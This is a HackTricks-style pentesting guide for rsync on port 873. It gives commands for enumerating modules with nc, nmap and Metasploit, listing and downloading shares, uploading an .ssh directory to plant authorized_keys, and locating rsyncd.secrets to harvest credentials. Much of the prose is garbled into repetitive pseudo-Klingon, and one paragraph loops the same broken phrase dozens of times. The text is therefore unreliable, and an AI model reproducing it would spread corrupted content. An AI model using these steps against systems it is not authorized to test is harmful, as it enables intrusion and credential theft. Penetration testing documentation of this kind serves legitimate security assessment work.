15 KiB
873 - Pentesting Rsync
htARTE (HackTricks AWS Red Team Expert) !HackTricks!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
From wikipedia:
rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.[3] It is commonly found on Unix-like operating systems. The rsync algorithm is a type of delta encoding, and is used for minimizing network usage. Zlib may be used for additional data compression,[3] and SSH or stunnel can be used for security.
Default port: 873
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
Enumeration
Banner & Manual communication
tlhIngan Hol translation:
cha'logh & Qapla' communication
tlhIngan Hol translation:
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
Enumerating Shared Folders
Rsync modules are recognized as directory shares that might be protected with passwords. To identify available modules and check if they require passwords, the following commands are used:
Qa'Hom QaD
Rsync modules DIvI' DIvI' 'ej lo'laHbe' 'e' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' commands vaj DIvI' 'ej passwords ghaH 'e' ghItlh 'e' **commands
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
ghItlhvam that some shares might not appear in the list, ghItlhvam hiding them. Additionally, accessing some shares might be restricted to specific credentials, indicated by an "Access Denied" message.
Brute Force
Manual Rsync Usage
ghItlhvam obtaining a module list, actions depend on whether authentication is needed. Without authentication, listing and copying files from a shared folder to a local directory is achieved through:
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
tlhIngan Hol:
QaStaHvIS, tlhIngan Hol vItlhutlhlaHchugh, tlhIngan Hol vItlhutlhlaHchugh, tlhIngan Hol vItlhutlhlaHchugh.
QaStaHvIS, credentials vItlhutlhlaHchugh, shared folder vItlhutlhlaHchugh, listing 'ej downloading vItlhutlhlaHchugh, password prompt vItlhutlhlaHchugh, yInID.
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
upload content-lI'wI' jatlhqa'pu'chugh, authorized_keys file laH access, lo'laHbe'chugh:
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
POST
To locate the rsyncd configuration file, execute:
tlhIngan Hol:
rsyncd qImHa' Daq yIlo':
<p>
<b>tlhIngan Hol:</b>
rsyncd qImHa' Daq yIlo':
</p>
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
DajatlhlaHbe'chugh, secrets file parameter vItlhutlh usernames and passwords laH rsyncd authentication.
References
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.